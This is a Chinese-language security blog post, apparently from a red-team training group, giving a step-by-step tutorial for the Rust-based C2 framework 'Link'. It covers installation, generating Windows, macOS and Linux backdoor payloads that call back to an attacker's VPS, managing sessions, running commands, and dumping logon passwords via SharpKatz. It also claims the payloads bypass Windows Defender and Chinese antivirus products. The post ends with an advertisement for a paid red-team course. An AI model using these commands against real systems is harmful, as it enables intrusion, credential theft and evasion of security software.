文章来源|MS08067 内网攻防知识星球
本文作者:清风(Ms08067内网小组核心成员)
学内网 认准Ms08067
⼀、⼯具简介
在翻看公众号的时候发现有⼤佬简单介绍了下这款⼯具,⽹上的教程⼏乎没有,简单研究了下。
Link :rust 语⾔开发的 c2 框架,因为开发语⾔⼩众,所以⽬前国内所有杀软都可过包括WindowsDefender。
功能虽然没有MSF和CobaltStrike成熟,但还是很强⼤的,⾜够实现红队渗透测试⼯作,当CS/MSF特征⽆法绕过的时候,可以尝试使⽤这个⼯具
项⽬地址:
https://github.com/postrequest/link
⼆、安装
不知道是什么原因,国外的vps安装后都⽆法⽣成载荷,暂时未能解决,最后⽤国内vps实验成功的
安装过程较为简单 :
clone https://github.com/postrequest/link git
cd link/
./kali-install.sh
执⾏后
会出现这个⻚⾯后,三个选项分别是:
1、继续安装(默认安装)
2、⾃定义安装
3、取消安装
这⾥选择 1 默认安装即可
安装过程较为漫⻓,需要等待下⾯进度条结束:
结束后后直接重启,因为 rust 安装完后需要重启⽣效 :
重启后,再次进⼊到/link⽂件夹下,运⾏启动命令:
./target/release/link //不建议进⼊/target/release/⽬录再执⾏link,那样会让你指定
证书位置
启动后,会让你设置⼀个监听端⼝,这个端⼝也是后续shellcode中的端⼝ :
然后进⼊到link的管理模式下,
主要⽤到前三条:
在 Windows, MacOS , Linux 中⽣成载荷:
generate vps-ip:port #⽣成 windows 后⻔
generate-osx vps-ip:port #⽣成 苹果 载荷
generate-linux vps-ip:port #⽣成 linux 载荷
Windows 上线:
⽣成Windows后⻔(过程相当漫⻓,请耐⼼等待):
generate vps-ip:9080
运⾏link.exe 后上线:
查看当前会话:links ,类似MSF的Sessions
进⼊到当前会话 links -i 会话ID :
进⼊到当前会话中后 可以执⾏命令 whoami
抓取密码:
这个模块需要安装 SharpCollection ⼯具,不然会报错,提示你安装
安装完后再次执⾏:
sharp //可罗列出所有的tools
功能很多,这⾥只介绍SharpKatz模块
SharpKatz 参数介绍:
https://github.com/b4rtik/SharpKatz
sharp svchost SharpKatz --Command logonpasswords //抓取密码
还有很多功能,后续待补充。
Linux上线:
⽣成后⻔:
然后上传到⽬标运⾏ ,成功上线,然后就是Linux上线后的操作:
执⾏命令:
shell linux命令
未完待续。。。
ByPass ⽅⾯:
通过测试发现:Windows Defender、⽕绒、 360 动态、静态都可过
1.7号 红队攻防 第5期 最后来袭
课程费用
每期班定价2999,第五期班早鸟价:2499(前40名送499元内网知识星球名额),每个报名学员都可享受一次免费重听后续任意一期班的权益,一次没学懂就再来一遍!
培训采用在线直播+随堂录播+作业+微信群讲师解答的形式,无需等待,报名后立即进入“内网星球”开始预习。毕业推荐HW,推荐就业,有永久录播,报一期班可免费再参加后续任意一期班,内部VIP学习群永久有效。(可开发票,支付信用卡、花呗分期)
报名咨询联系小客服
扫描下方二维码加入星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
原文始发于微信公众号(Ms08067安全实验室):⼀款新的C2攻击⼯具-Link
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论